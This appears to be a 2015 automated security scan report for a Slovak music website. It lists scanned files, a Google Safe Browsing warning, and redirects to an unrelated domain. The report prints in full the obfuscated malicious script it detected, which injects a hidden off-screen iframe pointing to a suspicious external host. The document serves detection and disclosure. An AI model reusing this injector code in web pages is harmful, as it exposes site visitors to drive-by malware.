Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hudbamesta.sk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hudbamesta.sk/ | 200 OK Content-Length: 9275 Content-Type: text/html | clean |
http://hudbamesta.sk/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93128 Content-Type: application/javascript | clean |
http://hudbamesta.sk/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://hudbamesta.sk/wp-content/plugins/mailchimp/js/scrollTo.js?ver=1.2.14 | 200 OK Content-Length: 2262 Content-Type: application/javascript | clean |
http://hudbamesta.sk/wp-includes/js/jquery/jquery.form.min.js?ver=2.73 | 200 OK Content-Length: 11116 Content-Type: application/javascript | clean |
http://hudbamesta.sk/wp-content/plugins/mailchimp/js/mailchimp.js?ver=1.2.14 | 200 OK Content-Length: 994 Content-Type: application/javascript | clean |
http://hudbamesta.sk/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.3 | 200 OK Content-Length: 4289 Content-Type: application/javascript | clean |
http://hudbamesta.sk/wp-content/plugins/mailchimp//js/datepicker.js?ver=3.6 | 200 OK Content-Length: 75876 Content-Type: application/javascript | clean |
http://googleleadservices.cn/statistics1.js | 200 OK Content-Length: 398 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://googlestats.cn/default.html'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('f0a7a142b755172da72ff74a1ac25199') + 1); _q.style.left = '-5597px'; document.write('<div id=\'__dr11938\'></div>'); document.getElementById('__dr11938').appendChild(_q); Antivirus reports:
| ||
http://hudbamesta.sk/o-hudbe-mesta/ | HTTP/1.1 302 Found Connection: close Date: Tue, 06 Jan 2015 20:30:17 GMT Location: http://medicalwki.com/ Server: nginx Vary: Accept-Encoding Content-Length: 206 Content-Type: text/html; charset=iso-8859-1 | clean |
http://medicalwki.com/ | 500 Can't connect to medicalwki.com:80 Content-Length: 189 Content-Type: text/plain | clean |
http://medicalwki.com/test404page.js | 500 Can't connect to medicalwki.com:80 Content-Length: 189 Content-Type: text/plain | clean |
http://hudbamesta.sk/videa-h/ | HTTP/1.1 302 Found Connection: close Date: Tue, 06 Jan 2015 20:30:18 GMT Location: http://medicalwki.com/ Server: nginx Vary: Accept-Encoding Content-Length: 206 Content-Type: text/html; charset=iso-8859-1 | clean |
http://hudbamesta.sk/kontakt/ | HTTP/1.1 302 Found Connection: close Date: Tue, 06 Jan 2015 20:30:18 GMT Location: http://medicalwki.com/ Server: nginx Vary: Accept-Encoding Content-Length: 206 Content-Type: text/html; charset=iso-8859-1 | clean |
http://hudbamesta.sk/videa/david-koller-tajne-koncertoval-v-bratislavskej-kaviarni/ | HTTP/1.1 302 Found Connection: close Date: Tue, 06 Jan 2015 20:30:18 GMT Location: http://medicalwki.com/ Server: nginx Vary: Accept-Encoding Content-Length: 206 Content-Type: text/html; charset=iso-8859-1 | clean |
http://hudbamesta.sk/videa/banda-zo-slovenska-obsadila-krcmu/ | HTTP/1.1 302 Found Connection: close Date: Tue, 06 Jan 2015 20:30:18 GMT Location: http://medicalwki.com/ Server: nginx Vary: Accept-Encoding Content-Length: 206 Content-Type: text/html; charset=iso-8859-1 | clean |
http://hudbamesta.sk/videa/pre-hudbu-mesta-zahrali-na-streche-slovenskeho-rozhlasu/ | HTTP/1.1 302 Found Connection: close Date: Tue, 06 Jan 2015 20:30:18 GMT Location: http://medicalwki.com/ Server: nginx Vary: Accept-Encoding Content-Length: 206 Content-Type: text/html; charset=iso-8859-1 | clean |
http://hudbamesta.sk/videa/pred-pentagonom-hrala-skupina-billy-barman-prisli-aj-policajti/ | HTTP/1.1 302 Found Connection: close Date: Tue, 06 Jan 2015 20:30:18 GMT Location: http://medicalwki.com/ Server: nginx Vary: Accept-Encoding Content-Length: 206 Content-Type: text/html; charset=iso-8859-1 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hudbamesta.sk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Jan 2015 20:30:15 GMT
Server: nginx
Vary: Cookie,User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://hudbamesta.sk/xmlrpc.php
GET / HTTP/1.1
Host: hudbamesta.sk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Jan 2015 20:30:15 GMT
Server: nginx
Vary: Cookie,User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://hudbamesta.sk/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: hudbamesta.sk
Referer: http://www.google.com/search?q=hudbamesta.sk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hudbamesta.sk
Referer: http://www.google.com/search?q=hudbamesta.sk
Result:
The result is similar to the first query. There are no suspicious redirects found.